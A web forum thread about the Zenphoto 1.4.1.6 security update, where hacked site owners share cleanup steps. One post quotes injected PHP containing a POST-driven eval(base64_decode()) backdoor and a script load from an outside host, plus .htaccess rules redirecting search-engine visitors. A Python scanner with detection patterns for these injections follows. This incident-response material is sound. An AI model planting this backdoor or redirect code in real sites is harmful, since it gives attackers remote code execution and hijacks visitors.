More info on:
http://www.zenphoto.org/news/zenphoto-1.4.1.6
Zenphoto 1.4.1.6 security update released
(31 posts)-
Don't forget to read the Forum rules and usage resources
Posted 1 year ago # -
Thanks to act as !
It's very good thing...
Posted 1 year ago # -
Is there any difference to the manual changes I made yesterday for 1.4.1.5? (I use SVN to manage my install and I'm loath to download and change if I already took care of it by manually removing it).
Posted 1 year ago # -
No, the 1.4.1.6 release (as noted on the post) just incorporates the changes mentioned on the 2nd security post. Otherwise it is just 1.4.1.5. Btw, that is mentioned in the release post's first sentence..;-)
Again, note that the svn trunk is NOT 1.4.1.6 but already 1.4.2 beta (the dev svn stream as well) as the 1.4.1.x line was actually considered complete. This has been announced a week or so ago.
Posted 1 year ago # -
A slightly different question: I have downloaded and installed the 1.4.3 DEV (8385) version and done the corrections you suggested in the "Security alert - Part 2 update 2". Am I OK?
P.S. One site was hacked, the other was not, but I cleaned and updated both anyways.
Posted 1 year ago # -
Yes, as far as we know. But I recommend to use the TRUNK svn as that will become the next version 1.4.2. That is beta and will not get new features until the scheduled release (see roadmap on the bugtracker). Using this will help us find bugs we missed.
The DEV svn is for 1.4.3 somewhere in the future. Currently both are still the same but soon this one might get experimental. So we can't recommend to use this on a live site currently.
Posted 1 year ago # -
Hi
My site was also hacked. I think no is clear but I didn't delete the jpg files with photos. How can I check that they are not infected?
Posted 1 year ago # -
I would say try a virus scan for the start.
Posted 1 year ago # -
After being affected by this loophole and clearing out the old install, when I come to upload (cPanel) the install package my host's system is rejecting the 1.4.1.6.zip saying it contains a virus (scanner is probably ClamAV).
I can not get any details as to which file it objects to.
Has this been an issue for anyone else?
Posted 1 year ago # -
Maybe we are missing something here. Without the "ajax file manager" we cannot use the "Files" tab under "Upload".
Which seems to mean the only way to add photos is via the web page upload.
Is there some other way to get Zenphoto to process files we already have copied to the server? That has always been our preferred method to load pictures.
Any help is appreciated.
Posted 1 year ago # -
The "Files" tab never provided a way to add photos to your gallery. It is just a way to upload files to your "uploaded" folder which you can then place as you wish on your pages through HTML.
It is the "Images" tab that provided the means for uploading photos. It is still present and operational.
Besides, there is always FTP to upload to your site. Zenphoto always processes images it finds in your albums folders.
Posted 1 year ago # -
SBillard, thanks for clearing that up for us. We are moving from another photo gallery to Zenphoto and just getting used to the file structure of Zenphoto.
Thanks so much for your quick response. It is really appreciated.
Posted 1 year ago # -
We are also working closely with the developer of ajaxfilemanager and hope to have a solution to the security issues soon.
Posted 1 year ago # -
Hi all,
My site was hacked and I lost a lot of information :'( But I was able to find some information in the Apache logs.
The hacker succeeded in downloading the [link removed by moderator] file and executing it. It has mostly to remove all files owned by apache.
I hope this will help someone!
Posted 1 year ago # -
I removed the link to the zip file because I'm not sure if it's potentially dangerous.
Posted 1 year ago # -
Hi,
I'm OK with this. So the zip contains no virus but PHP, Perl and SQL files. The PHP file is similar to ajaxterm. I think that my issue could help someone.
If you want, I can post the PHP file screenshot: http://tinypic.com/r/301ev89/5
Posted 1 year ago # -
My site (fotofill.net) was hacked too. We rescanned the site, had the host do the same. I traced the IP and blocked any IP from Russia-Ukraine. It appears the hacker used tiny_mce to get access. I am pretty new to all this. Here is the message from my host:
After further investigation, it appears that a hacker was able to inject malicious code into most (if not all) your php files by using the tiny_mce editor function from your Zenphoto installation.
They suggested this:
1). Update all scripts and plugins to remove vulnerabilities inherent in older versions.
2). Scan the local system used to access this account for malware using the following software: MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ). Many instances of compromised login details are due to local malware intercepting login details.
We did that. We asked Google to scan the site also. Still waiting...
My problem now is that my logins and passwords were wiped out at ZP and I cannot get in. Anything with fotofill.net in it is being blocked by browsers. Can someone help me get to my zp-core? Thanks
Posted 1 year ago # -
If the whole fotofill.net is blocked it is probably by your hosting company. That is a pretty standard response to this kind of attack. For instance my hoster did this. I had to use FTP to cleanse the site and then contact the hoster to have it unblocked.
There is another thread with details on how to cleanse your site, but basically it involves removing all the site files and reloading from backup. Always, of course, do not restore the zenphoto files but obtain the fixed version and install that.
Posted 1 year ago # -
The blocking of the site is not by the hosting company. It is blocked in the browser by using a warning database Google & Co provide that most browser vendors use.
Sorry, you will have to wait until your site is rescanned and removed from that. On Google that might take a few days. You can of course ignore that warning and proceed. How to reset Zenphoto passwords is explained on our troubleshooting.
Posted 1 year ago # -
Hello! I have 2 zenphoto galleries on my site and both of them got hit by the ajax bug so now I am trying to fix it (really annoying because I am in the middle of two large class projects). Based on what I have read on this post and the other couple related posts, this is what I have gathered the solution to fix it is:
1. Delete ajax upload manager folder inside of zenphoto
2. Install latest zenphoto release
3. Go through all php and .htaccess files on the website to ensure they are clean
Does that sound right? I am still new to zenphoto/website management in general and I want to be sure I don't do something stupid while trying to clean it up and lose the 7000+ images between my two galleries, lol.
Thank you for your help!
Posted 1 year ago # -
That is what we know so far by reports of users (as we ourselves were not hacked).
Posted 1 year ago # -
Ok great. I will give that a shot then!
I am enjoying Zenphoto thus far and thank you for your hard work on this. I am now following the RSS feed so I can get updates/security fixes faster (had I done that before I probably wouldn't be in this boat :P).
Posted 1 year ago # -
I appear to also have been affected by this vulnerability. They had my Zenphoto domain redirecting to http://(hacker's URL).in/jaki/index.php as you can see below and also altered the .htaccess and php files for the other domains in my shared hosting account. The latter changes seem to have had no noticeable effect (the rest of the sites run on Drupal 6 or 7).
Can anyone else who was hacked let me know if the hackers altered anything else on their systems that I should fix? I purged everything but the albums folder from my Zenphoto install and removed the added code from the *.php and .htaccess files on my other domains. Is there anything else I should do to set things right?
For reference, the hackers added this to the top of all PHP files:
    global $sessdt_o;
    if(!$sessdt_o) {
        $sessdt_o = 1;
        $sessdt_k = "lb11";
        if(!@$_COOKIE[$sessdt_k]) {
            $sessdt_f = "102";
            if(!@headers_sent()) {
                @setcookie($sessdt_k,$sessdt_f);
            } else {
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
            }
        } else {
            if($_COOKIE[$sessdt_k]=="102") {
                $sessdt_f = (rand(1000,9000)+1);
                if(!@headers_sent()) {
                    @setcookie($sessdt_k,$sessdt_f);
                } else {
                    echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
                }
                $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
                $sessdt_v = urlencode(strrev($sessdt_j));
                $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
                echo "<script src='$sessdt_u'></script>";
                echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
            }
        }
        $sessdt_p = "showimg";
        if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}
    }

…and this to the end of all the .htaccess files:

    ErrorDocument 400 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 401 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 403 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 404 http://(hacker's URL).in/jaki/index.php
    ErrorDocument 500 http://(hacker's URL).in/jaki/index.php
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*)
    RewriteRule ^(.*)$ http://(hacker's URL).in/jaki/index.php [R=301,L]
    </IfModule>

Thanks!
Posted 1 year ago # -
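A defender-side check for the two injections quoted in the post above, as an added example that is not part of the original thread: it walks a web root and flags .php files carrying the `$sessdt_` prefix or the POST-driven `eval(base64_decode(...))`, and .htaccess files with full-URL `ErrorDocument` or referer-conditioned redirect rules. The function names, marker labels, sample tree and the `redirect.example.invalid` host are constructed for the illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Markers derived from the injected code quoted in the post above.
PHP_MARKERS = {
    "sessdt variable prefix": re.compile(r"\$sessdt_[a-z]\b"),
    "eval of base64-decoded POST data": re.compile(r"eval\s*\(\s*base64_decode\s*\([^;]*\$_POST"),
}
HTACCESS_MARKERS = {
    "ErrorDocument pointing at a full URL": re.compile(
        r"^\s*ErrorDocument\s+\d{3}\s+https?://", re.I | re.M),
    "referer-conditioned rewrite to a full URL": re.compile(
        r"RewriteCond\s+%\{HTTP_REFERER\}[^\n]*\n\s*RewriteRule\s+\S+\s+https?://", re.I),
}

def scan_tree(root):
    """Map each suspicious file (path relative to root) to the markers it matched."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            markers = (PHP_MARKERS if name.lower().endswith(".php")
                       else HTACCESS_MARKERS if name == ".htaccess" else None)
            if markers is None:
                continue
            path = Path(dirpath, name)
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = [label for label, rx in markers.items() if rx.search(text)]
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Scan a constructed sample tree (file names and redirect host are made up)."""
    samples = {  # constructed inputs: two clean files, two carrying the quoted patterns
        "index.php": "<?php echo 'gallery'; ?>\n",
        "zp-core/functions.php": "<?php global $sessdt_o; eval(base64_decode($_POST['showimg'])); ?>\n",
        ".htaccess": "RewriteEngine On\nRewriteRule ^album/(.*)$ index.php?album=$1 [L]\n",
        "other-site/.htaccess": "ErrorDocument 404 http://redirect.example.invalid/index.php\n"
            "RewriteCond %{HTTP_REFERER} ^.*(google|bing)\\.(.*)\n"
            "RewriteRule ^(.*)$ http://redirect.example.invalid/index.php [R=301,L]\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)
```

Call `scan_tree()` on the real document root; a hit is a prompt for manual review, since legitimate sites can also use a full-URL `ErrorDocument`.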
Here are several insights to the hacks by a user:
http://www.zenphoto.org/support/topic.php?id=9951#post-58366
Posted 1 year ago # -
I have had more than 2500 php files infected with the prefixed code
different referring domain
all my wordpress files, piwik, sigh
Posted 1 year ago # -
Also several of my websites that use ZP were hacked. I have recovered 1 website, but I'm having trouble with another one: I have deleted all web files and when I visit the URL, I keep being redirected, although the site is completely empty, and all htaccess files were deleted too. So my question is, what part keeps redirecting??
Posted 1 year ago # -
Please take a look to the forum topic linked above. I personally can't answer as we were not affected.
Posted 1 year ago # -
puregraphx : I just finished recovery from one of my zengallery installs. If you're still experiencing a redirection, chances are there is a shell access only directory above your FTP (this is the case for godaddy and all of their resellers). If you are a godaddy user, you'll need to enable SSH and use port 22 to find the master htaccess file for your shared hosting account (which isn't visible if you're just using FTP on port 21, only SFTP on port 22). I hope this helps.
Posted 1 year ago # -
Can anyone answer if the cache files need to be cleared before or after the upgrade to prevent the same security hole from allowing unauthorized users in? - I've noticed a lot of very long rss cache files (example: rss_ampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampamplang.xml)
Is this normal activity for zengallery?
Posted 1 year ago # -
I would recommend to clear all caches. Does not hurt as they are recreated on request anyway. It is unlikely that images contain hacked code but the cached html or rss files might do (not php but hacked links or js code).
No, such rss files are not normal, unless you have an album with that long name. Album rss feed files look like this:
rss_Screenshots_screenshots_en_US.xml
This is a cached feed of the screenshots subalbum of the Screenshots album (example from our own site). Language version is English which is the default and only one used on our site anyway.
Posted 1 year ago #